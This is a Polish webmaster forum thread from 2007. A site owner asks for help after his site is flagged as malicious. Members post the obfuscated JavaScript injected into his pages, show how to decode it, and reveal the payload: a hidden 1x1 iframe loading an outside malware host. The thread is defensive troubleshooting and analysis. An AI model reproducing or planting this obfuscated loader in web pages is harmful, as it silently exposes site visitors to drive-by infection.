WebSter 0 Zgłoś post Napisano Grudzień 5, 2007 Z dnia na dzien na stronach mojego serwisu zadomowila sie dziwna aplikacja, ktora przez IE jak i samo Google rozpoznawana jest jego wirus lub oprogramowanie szpiegujace. Zupelnie nie wiem jak sie tego pozbyc, a nie ukrywam ze bardzo negatywnie wplywa to na rozwoj witryny. Prosze o pomoc, informacje w jaki sposob moge sie tego pozbyc? www.my-sonyericsson.pl Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość Pokuć Zgłoś post Napisano Grudzień 5, 2007 Miałem to samo. Strone miałem postawioną na Joomla, serwer w nazwa.pl. Jakiś kod był złośliwy i nie szło go łatwo usunąc. Efektem było wywalenie joomli a wraz z nią półroczny dorobek i ostateczna decyzja o rezygnacji z tego. Nadpisanie plików nie pomogło bo baza była zarażona Otwarcie strony powodowało albo zawieche albo pobieranie jakiegos pliku. Był to wirus made by CCCP Napisz na czym twoja strona. Jak CMS to niezbyt fajnie, choć to zależy od tego czy ma skomplikowaną budowe. Jak html + php to pół biedy bo byc moze trzeba każda strone przejzec w edytorze i wywalić fragment Udostępnij ten post Link to postu Udostępnij na innych stronach
moron 0 Zgłoś post Napisano Grudzień 5, 2007 wydaje mis ie ze to to <script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> kto sie zna na dekodowaniu bo to jakies niestandardowe jest ja sie znam na php a nie na ja javie Udostępnij ten post Link to postu Udostępnij na innych stronach
shive 0 Zgłoś post Napisano Grudzień 5, 2007 Tak to jest jak się używa dziurawych CMSów. Wyczyść wszystko do zera, zainstaluj najnowszą joomlę (jeśli już musisz) i nie wgrywaj zasyfionych pluginów sprzed nie wiadomo ilu lat. Udostępnij ten post Link to postu Udostępnij na innych stronach
Tomi 0 Zgłoś post Napisano Grudzień 5, 2007 Dekodowanie JS to śmiesznie prosta sprawa <script language="JavaScript"> <!-- e = '0x00' + '19';str1 = "%A2%FA%F1%EC%86%EB%EA%E1%F2%FD%A5%B8%EC%F1%EB%F1%F8%F1%F2%F1%EA%E1%A0%FE%F1%FA%FA%FD%F4%B8%A4%A2%F1%FC%E8%F9%F5%FD%86%EB%E8%FB%A5%B8%FE%EA%EA%F6%A0%B7%B7%EA%F1%F6%F7%FB%F4%EA%B4%FB%F7%F5%B7%F2%FA%B7%F5%FD%F4%EA%B7%B8%86%EF%F1%FA%EA%FE%A5%A9%86%FE%FD%F1%FF%FE%EA%A5%A9%A4%A2%B7%F1%FC%E8%F9%F5%FD%A4%A2%B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);} // wywaliłem to :-) zeby nie smierdziało --> document.write(str); --> </script> <script language="JavaScript"> document.write('<textarea cols="100%" rows="60">'); document.write(str); // A TUTAJ TEN ŚMIEC document.write('</textarea>'); </script> Wynik: <div style="visibility:hidden"><iframe src="http://tipocnt.com/ld/ment/" width=1 height=1></iframe></div> Udostępnij ten post Link to postu Udostępnij na innych stronach
WebSter 0 Zgłoś post Napisano Grudzień 6, 2007 Coz, nic tylko podziekowac )) Dziekuje za pomoc. Chyba juz usuniete. Udostępnij ten post Link to postu Udostępnij na innych stronach
